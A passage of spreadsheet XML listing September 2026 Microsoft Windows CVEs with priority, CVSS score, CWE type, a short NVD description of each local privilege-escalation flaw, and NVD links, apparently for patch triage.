      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q992" s="5" t="inlineStr"/>
      <c r="R992" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S992" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D993" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F993" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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3" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q993" s="5" t="inlineStr"/>
      <c r="R993" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S993" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D994" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F994" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q994" s="5" t="inlineStr"/>
      <c r="R994" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S994" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D995" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F995" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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5" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q995" s="5" t="inlineStr"/>
      <c r="R995" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S995" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D996" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F996" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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96" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q996" s="5" t="inlineStr"/>
      <c r="R996" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S996" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="D997" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F997" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr"/>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q997" s="5" t="inlineStr"/>
      <c r="R997" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S997" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70578</t>
        </is>
      </c>
      <c r="D998" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F998" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr"/>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q998" s="5" t="inlineStr"/>
      <c r="R998" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S998" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70578</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="D999" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F999" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr"/>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q999" s="5" t="inlineStr"/>
      <c r="R999" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S999" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71332</t>
        </is>
      </c>
      <c r="D1000" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1000" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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0" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1000" s="5" t="inlineStr"/>
      <c r="R1000" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1000" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71333</t>
        </is>
      </c>
      <c r="D1001" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1001" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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01" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1001" s="5" t="inlineStr"/>
      <c r="R1001" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1001" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71340</t>
        </is>
      </c>
      <c r="D1002" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1002" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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2" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q1002" s="5" t="inlineStr"/>
      <c r="R1002" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1002" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71342</t>
        </is>
      </c>
      <c r="D1003" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1003" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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03" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q1003" s="5" t="inlineStr"/>
      <c r="R1003" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1003" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71351</t>
        </is>
      </c>
      <c r="D1004" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1004" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1004" s="5" t="inlineStr"/>
      <c r="R1004" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S1004" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71353</t>
        </is>
      </c>
      <c r="D1005" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1005" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1005" s="5" t="inlineStr"/>
      <c r="R1005" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S1005" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72926</t>
        </is>
      </c>
      <c r="D1006" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1006" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr"/>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1006" s="5" t="inlineStr"/>
      <c r="R1006" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1006" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72930</t>
        </is>
      </c>
      <c r="D1007" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1007" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr"/>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1007" s="5" t="inlineStr"/>
      <c r="R1007" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1007" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72952</t>
        </is>
      </c>
      <c r="D1008" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1008" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1008" s="5" t="inlineStr"/>
      <c r="H1008" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1008" s="5" t="inlineStr"/>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr"/>
      <c r="L1008" s="5" t="inlineStr"/>
      <c r="M1008" s="5" t="inlineStr"/>
      <c r="N1008" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1008" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1008" s="5" t="inlineStr"/>
      <c r="R1008" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S1008" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72963</t>
        </is>
      </c>
      <c r="D1009" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1009" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1009" s="5" t="inlineStr"/>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr"/>
      <c r="L1009" s="5" t="inlineStr"/>
      <c r="M1009" s="5" t="inlineStr"/>
      <c r="N1009" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1009" s="5" t="inlineStr"/>
      <c r="R1009" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1009" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
